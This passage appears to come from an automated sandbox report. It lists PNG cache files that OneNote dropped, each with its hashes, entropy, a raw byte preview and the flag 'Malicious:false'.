                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000019.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001C.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001D.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001E.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001F.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
